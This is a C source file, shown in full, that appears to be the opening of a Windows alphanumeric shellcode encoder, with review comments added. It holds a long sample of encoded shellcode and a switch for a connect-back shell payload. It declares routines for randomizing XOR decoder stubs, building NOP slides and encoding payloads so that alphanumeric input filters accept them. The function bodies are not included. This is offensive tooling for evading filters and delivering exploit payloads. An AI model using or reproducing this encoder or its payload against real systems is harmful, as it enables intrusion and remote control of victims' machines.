- #include <time.h>
- #include <stdio.h>
- #include <windows.h>
- #define MAX_BYTES 0x100 // 0x100 = 256, the number of distinct byte values; its use is not visible on this page
- #define MAX_ENCODED_SHELLCODE 2000 // size cap for the encoded output; per the author the buffer is allocated on the stack, so every write into it needs an explicit bound check
- #define MIN_IP_STR_LEN 7 // presumably the shortest dotted-quad IPv4 string ("0.0.0.0" is 7 characters)
- #define MAX_IP_STR_LEN 15 // presumably the longest dotted-quad IPv4 string ("255.255.255.255" is 15 characters, terminating NUL not counted)
- #define OFFSET_XOR_AL1_A 15 // OFFSET_*: presumably byte offsets into the decoder stub; the stub is not on this page, so the values cannot be checked here
- #define OFFSET_XOR_AL1_B 18
- #define OFFSET_XOR_AL2_A 37
- #define OFFSET_XOR_AL2_B 40
- #define OFFSET_PUSH_DWORD1 0
- #define OFFSET_PUSH_DWORD2 1
- #define OFFSET_PUSH_DWORD3 4
- #define OFFSET_PUSH_DWORD4 12
- #define OFFSET_RANDOMIZED_DECODER_HEAD 14 // NOTE(review): with SIZE below this looks like a region of bytes 14..29, which would contain offsets 15 and 18 above - confirm
- #define SIZE_RANDOMIZED_DECODER_HEAD 16
- BYTE EncodedShellcode[] = // author's sample output; per the original comment it encodes 336 bytes. The array is sized from the literal, so it also holds the terminating NUL. The text uses only letters and digits, so an input filter that checks character class alone would accept it.
- "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
- "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
- "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
- "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
- "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
- "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
- "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
- "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
- "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
- "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
- "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
- "1telLPYuGyNvX1TyJ3yLdOwckr";
- // example: characters listed in ADDITIONAL_CHARSET appear twice in ALNUM_CHARSET, which per the author makes the encoder choose them more often (here: uppercase letters)
- #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
- #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset: ADDITIONAL_CHARSET followed by 0-9, A-Z, a-z (adjacent string literals concatenate)
- // feel free to
- //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV
- #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder////////////
- #define _Q(str) #str // stringifies str exactly as written; note that _Q (underscore + uppercase letter) is an identifier reserved for the implementation
- #define Q(str) _Q(str) // expands str first, then stringifies the result
- #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) // intended result: "<macro name>" " // <--- buffer offset\n" "<expanded value>". Pasting string literals with ## is not valid in standard C (adjacent literals concatenate without it); presumably this relies on a lenient preprocessor - confirm
- ///////////////////////////////////
- #define CONNECT_BACK_SHELLCODE //
- //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------.
- /////////////////////////////////////////////////////////////////// |
- int main(); // | forward declarations; the function bodies are not on this page. In C, "()" leaves main's parameters unspecified, "(void)" states there are none
- UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | the pattern has an explicit length but alnum_str does not - presumably NUL-terminated; verify against the body
- UCHAR get_push_register_instruction(UCHAR *reg); // |
- UCHAR get_random_alnum_value(); // |
- UCHAR get_random_alnum_push_dword_opcode(); // |
- UCHAR *get_nop_slide(UINT size, UINT slide); /////// |
- UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | NOTE(review): offset, length and slide are caller-supplied; whether the body keeps them within str_len cannot be checked here
- UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | same bounds question as slide_substr_forward
- UCHAR *shuffle(UCHAR str[], UINT length); /////// |
- DWORD my_htonl(DWORD dw_in); // |
- DWORD ip_str_to_dw(UCHAR *str); // | presumably parses a dotted-quad string (see MIN_IP_STR_LEN / MAX_IP_STR_LEN); input validation is not visible here
- BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // |
- BOOL is_alnum(UCHAR c); // |
- BOOL str_is_alnum(UCHAR *str); // |
- UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | "xor" is an ordinary identifier in C, but an operator token in C++ and a macro once <iso646.h> is included
- UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // |
- struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key is used before its definition below; that is valid for pointer types
- struct xor2_key *choose_random_node(struct xor2_key *head); // |
- void free_p_xor2_key(struct xor2_key *node); // | presumably releases nodes returned by the functions above; who owns them is not visible here
- // |
- struct xor2_key { // | node of a doubly linked list (prev/next) carrying two byte values, xor2 and key
- UCHAR xor2; // |
- UCHAR key; // |
- struct xor2_key *prev; // |
- struct xor2_key *next; // |
- } xor2_key; // besides the type, this defines a file-scope object named xor2_key; if only the type was wanted that is likely unintended - confirm against the rest of the file